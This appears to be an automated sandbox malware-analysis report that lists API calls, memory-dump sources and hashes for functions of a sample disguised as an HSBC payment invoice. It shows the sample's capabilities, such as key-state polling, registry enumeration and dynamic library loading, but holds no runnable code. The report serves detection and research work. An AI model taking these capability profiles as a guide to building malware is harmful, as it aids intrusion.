                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 23cc469accf07ef07b08021a169ef16fa0030fb6040411116f4796d03eb59617
                    • Instruction ID: 7e78fcbf33e1475e46a402463bf8eed604b02b093ea56b18f8072c726690bfc7
                    • Opcode Fuzzy Hash: 23cc469accf07ef07b08021a169ef16fa0030fb6040411116f4796d03eb59617
                    • Instruction Fuzzy Hash: 8F21A17560538DABDB209F6A9C04A9AB7E8BF55734F201619FCE0E32D0D7709841CB51
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EEAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EEAF13
                    • __swprintf.LIBCMT ref: 00EEAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F0F910), ref: 00EEAF6A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: b2f8853c9230a2758a85047fe091f114124d5a83754b7522ce8bca91754ae38e
                    • Instruction ID: c3fb27b88f8b41c5225471ff0ca75939c1a5fd4ccb51396a7169a59681b0ffa2
                    • Opcode Fuzzy Hash: b2f8853c9230a2758a85047fe091f114124d5a83754b7522ce8bca91754ae38e
                    • Instruction Fuzzy Hash: 12216230A0010DAFCB10EB65CC85DAE77F8EF89704B0440A9F509AB252DB71EA45DB61
                    APIs
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                      • Part of subcall function 00EDA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDA399
                      • Part of subcall function 00EDA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDA3AC
                      • Part of subcall function 00EDA37C: GetCurrentThreadId.KERNEL32 ref: 00EDA3B3
                      • Part of subcall function 00EDA37C: AttachThreadInput.USER32(00000000), ref: 00EDA3BA
                    • GetFocus.USER32 ref: 00EDA554
                      • Part of subcall function 00EDA3C5: GetParent.USER32(?), ref: 00EDA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 00EDA59D
                    • EnumChildWindows.USER32(?,00EDA615), ref: 00EDA5C5
                    • __swprintf.LIBCMT ref: 00EDA5DF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: 09775ab6a7c2f2450aa1c009e08907eaaf9928e9735de5fe198bb664878daa0f
                    • Instruction ID: 133408428f01606c98dfa09103af3870ba72b2829ec405158b394087af317661
                    • Opcode Fuzzy Hash: 09775ab6a7c2f2450aa1c009e08907eaaf9928e9735de5fe198bb664878daa0f
                    • Instruction Fuzzy Hash: A611A871500208BBDF107F64DC85FEE37B9EF49700F045076B91C7A192CA759A469B75
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00EE2048
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: eb0d7744fba96e32a6272baee74c5b5306c360d87e6862e4b2dc14e40682ed81
                    • Instruction ID: 77b9634dc3a599a4dd8d3fe8ed5ca6c7ecf31cb953dd0d7d47b583d626b8445f
                    • Opcode Fuzzy Hash: eb0d7744fba96e32a6272baee74c5b5306c360d87e6862e4b2dc14e40682ed81
                    • Instruction Fuzzy Hash: D9115B7190010D8FCF10EFA5D8914EEB7F4FF5A304F1094A9D995BB292EB32A90ADB50
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F0F910), ref: 00EF903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F0F910), ref: 00EF9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EF91EB
                    • SysFreeString.OLEAUT32(?), ref: 00EF9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: df5980551ae088624b5b545b04330649923e9f9dddf3a07889361a14547a55b7
                    • Instruction ID: 1251dfc0cfa93239cc860a7c661e615617e91a2e7bb69b446d71ce18ec708f4d
                    • Opcode Fuzzy Hash: df5980551ae088624b5b545b04330649923e9f9dddf3a07889361a14547a55b7
                    • Instruction Fuzzy Hash: 16F11971A00109EFDB14DF94C888EBEB7B9FF89314F109099FA55AB251DB31AE45CB50
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EFEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EFEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EFF07E
                    • CloseHandle.KERNEL32(?), ref: 00EFF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 70d02ddac4b8a1df15d9014af5403874ceb75d6bc4b29aadbd5f7fae07b47dd7
                    • Instruction ID: ebaeab9b44e2961e80318113dcfd8af52e47371c292b078884194fc78701563f
                    • Opcode Fuzzy Hash: 70d02ddac4b8a1df15d9014af5403874ceb75d6bc4b29aadbd5f7fae07b47dd7
                    • Instruction Fuzzy Hash: 7F815271A043019FD724EF24CC86B7AB7E5AF88710F54981DF99EE7292DB70AC418B51
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F003C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F0040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 00F0043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00F00447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: 79b86a17178915ca99edcf1fa31f1f5724cdca50c54d404508c370b8e5e2d4e7
                    • Instruction ID: db42fe1e50867a36d1d2918625fbe5f271b727f366d803d90b3d7470b575c10c
                    • Opcode Fuzzy Hash: 79b86a17178915ca99edcf1fa31f1f5724cdca50c54d404508c370b8e5e2d4e7
                    • Instruction Fuzzy Hash: 04515931608204AFD714EB64CC81F6AB7E8FF84714F04892EF59997292DB31E905EB52
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EFDC3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EFDCBE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EFDCDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EFDD1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EFDD35
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: a5e1fd6d5c6cb9ba15c25c226607aa216e21d81095b809d687397754e6ee5b9b
                    • Instruction ID: cdfa1ede65c6af051dba894e73189fe9d8be354e1c22a6218a72f8fe4e394b8c
                    • Opcode Fuzzy Hash: a5e1fd6d5c6cb9ba15c25c226607aa216e21d81095b809d687397754e6ee5b9b
                    • Instruction Fuzzy Hash: E0513735A04209DFCB00EF68C8849ADFBF5FF59314B0991A9E919AB312DB31ED45CB91
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EEE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EEE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EEE8F2
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EEE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EEE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: d50cb6dc04e4c0bece30e994e37cd1fe29f88004a92bbf9b2cf4df7cb9ec03b5
                    • Instruction ID: 58110e6377c354a6ea7e8f570cf878371f3b0ded508085281421e0d3fcbf09eb
                    • Opcode Fuzzy Hash: d50cb6dc04e4c0bece30e994e37cd1fe29f88004a92bbf9b2cf4df7cb9ec03b5
                    • Instruction Fuzzy Hash: E251F935A00209DFCB15EF65C9819AEBBF5EF49314B189099E849BB362CB31ED11DB50
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf9ff502378c3cbe8e94ba04e8a6364c8fd30db41d1d28ab5bed42946e926c06
                    • Instruction ID: 0ab2bc54c0819d92d495cc0d06c95e17a474a9bb4b16e956708b4ddae732697f
                    • Opcode Fuzzy Hash: bf9ff502378c3cbe8e94ba04e8a6364c8fd30db41d1d28ab5bed42946e926c06
                    • Instruction Fuzzy Hash: 7141DF39D00308AFD720DB28CC48FA9BBA9FB09320F154265F855E72E1D771AD41FA52
                    APIs
                    • GetCursorPos.USER32(?), ref: 00E82357
                    • ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                    • GetAsyncKeyState.USER32(00000001), ref: 00E82399
                    • GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 09726d4c88a30f8f80a9d2f5d598a1ea4f5d2df4e206b1d170c29d788231d236
                    • Instruction ID: 4390626a800e17e73e4541dfc1aed5ab5ab3f2213b4aac7b7e0e8ed9409accc9
                    • Opcode Fuzzy Hash: 09726d4c88a30f8f80a9d2f5d598a1ea4f5d2df4e206b1d170c29d788231d236
                    • Instruction Fuzzy Hash: E341813550851AFBDF159FA8CC44AEABB74FB05324F20431AF92CA22A0C7355954EB91
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00ED69A9
                    • TranslateMessage.USER32(?), ref: 00ED69D2
                    • DispatchMessageW.USER32(?), ref: 00ED69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED69EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: 7e4ade35855574da39bb234d790940d2f1c7102d4d34d61f7752aa7a839d7dfd
                    • Instruction ID: dc1cbcda97e51cf8ddf16e9405a11e67b8895535ff01075779f16adcf92174e4
                    • Opcode Fuzzy Hash: 7e4ade35855574da39bb234d790940d2f1c7102d4d34d61f7752aa7a839d7dfd
                    • Instruction Fuzzy Hash: B931E57150024AAEDB20CF74CC84BF67BA8EB13318F105167E825E22A1D775988BE791
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00ED8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00ED8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ED8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00ED8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ED8FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 9dc4488e5f9667297f5a665f6a9c5d75b766a961a4180def9889927aec37158a
                    • Instruction ID: 335f6ba12df353ac23dce7168f7a261098b1a58f6b98aab3d3d799a1112c6bd7
                    • Opcode Fuzzy Hash: 9dc4488e5f9667297f5a665f6a9c5d75b766a961a4180def9889927aec37158a
                    • Instruction Fuzzy Hash: 3031C07160021DEFDB14CF68DE4CA9E7BB6FB04315F10422AF925E62D0C7B09915DB90
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00EDB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EDB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EDB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EDB742
                    • _wcsstr.LIBCMT ref: 00EDB74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 3ff5d37ccd05865ad7512bb925ad7b89c04196604e55652bb709c98f4b40307e
                    • Instruction ID: b91b3a98a8b55abd6a8b405a5cf0e907f2e2bb2d274b7d07a0fb2b775d1bf655
                    • Opcode Fuzzy Hash: 3ff5d37ccd05865ad7512bb925ad7b89c04196604e55652bb709c98f4b40307e
                    • Instruction Fuzzy Hash: FE21D731204204FBEB255B399C49E7B7B9CEF4A760F01516BF805EA2A1FB61DC429660
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F0B44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F0B471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F0B489
                    • GetSystemMetrics.USER32(00000004), ref: 00F0B4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EF1184,00000000), ref: 00F0B4D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: a6ce8afc5c03cfe0f99b0506baeb19ed1665b3c295105fbec83bd081e2070333
                    • Instruction ID: 7f573414b167fdfe88117bb64a049d7fb903633b63355555143abc9f94663d74
                    • Opcode Fuzzy Hash: a6ce8afc5c03cfe0f99b0506baeb19ed1665b3c295105fbec83bd081e2070333
